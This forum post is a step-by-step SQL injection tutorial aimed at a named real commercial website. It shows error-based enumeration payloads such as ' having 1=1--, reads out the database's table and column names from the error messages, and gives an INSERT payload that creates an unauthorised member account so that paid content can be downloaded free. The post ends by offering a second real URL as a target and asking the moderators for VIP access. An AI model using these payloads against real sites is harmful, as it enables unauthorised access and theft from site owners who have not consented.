OK boys and girls. Here is how you can hack some sites using a method called SQL injection. Now as you all know, sites use databases to store their users information. SQL Server from microsoft is one of the popular databases and 99% of the times the sites using this database are coded in a language called ASP. The pages on such a site end with the extension .asp The first test we need to do is to find a form on such a site say for example a login form. Now our objective is to create an account on such a site. Ill take a case study. Just today I got an email from a internet marketer promoting this. I mailed him about this vulnerability but he hasn't responded, so I guess hes not bothered about this.. oh well... http://www.adsalternative.com/index.asp So we go to the members login page http://www.adsalternative.com/members/login.asp BIG mistake letting people know the login page to the members area. Now we enter the Code: ' character in the username field. We get this message. "Please ensure that you enter both your Username and your Password in order to log in to the members' area" Which means that hes validating both the username and password. So lets enter ' in both the fields and press login Which returns this error Code: "Microsoft OLE DB Provider for SQL Server error '80040e14' Incorrect syntax near 'ds'. /includes/databaseconnect.asp, line 21 " Which means that his asp script isnt checking for the ' character and this is the basis of this expliot. Now we type ' having 1=1-- into the user name and ' into the password and press login Which returns us this error Code: Microsoft OLE DB Provider for SQL Server error '80040e14' Column 'members.id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /includes/databaseconnect.asp, line 21 So now we know that his table name is members and his first column is id. Now we use a "group by" SQL clause to find out the other column names so we type the user name as ' group by users.id having 1=1-- and ' as the password and press login which returns the error Code: Microsoft OLE DB Provider for SQL Server error '80040e14' Column 'members.emailAddress' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /includes/databaseconnect.asp, line 21 so we know his next column is emailAddress. Continuing in this manner, grouping by each column name, we get his whole table structure Once we have that all we need to do is insert a record with our name. So in the username field we enter Code: '; insert into members(username,password) values('jack', 'hack')-- and in the password field we enter Code: ' and press login This has created us an account with the username jack and the password hack. Now we can login with this username and password and download all his shite for free Another example of poor site protection :nutkick: So mods does this qualify for the VIP access http://tubeautomator.com/squeeze.php'